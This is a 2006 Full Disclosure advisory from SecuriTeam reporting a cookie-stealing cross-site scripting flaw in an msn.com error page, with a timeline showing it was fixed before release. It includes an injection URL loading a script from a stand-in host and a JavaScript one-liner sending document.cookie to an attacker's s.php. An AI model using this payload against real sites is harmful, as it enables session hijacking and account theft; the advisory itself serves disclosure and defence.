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Full Disclosure: Cookie-stealing XSS on msn.com

Cookie-stealing XSS on msn.com

From: SecuriTeam Assisted Disclosure <SPAD_at_securiteam.com>
Date: Tue, 25 Jul 2006 11:56:30 +0300

Summary
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A cookie-stealing Cross-site scripting vulnerability was found on MSN's
website (msn.com). Using this vulnerability, an attacker could potentially
gain access to a victim's Inbox.

This vulnerability was discovered by: tontonq and Nir Goldshlager.

Disclosure timeline
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SecuriTeam was asked to assist the researchers with contacting Microsoft.

Reported to vendor: 18th of July, 2006.
Vendor response: 18th of July, 2006.
Resolved: 19th of July, 2006.
Public disclosure: 25th of July, 2006.

Technical description
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A cookie-stealing XSS issue was discovered on MSN's web site.

Example of the issue:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
That error page gets the CB variable into a script tag.

If John Doe wanted to steal a victim's cookie, he could use this example
Javascript
code:
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;

As such, if for example, s.php stores the cookie variable somewhere, the
attacker can set that stored cookie and "jump" to the Inbox.

For illustration, an older similar issue from 2005 on hotmail.com discovered
by Alex de Vries can be found here:
http://www.net-force.nl/files/articles/hotmail_xss/

About SecuriTeam's Assisted Disclosure
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Received on Jul 25 2006

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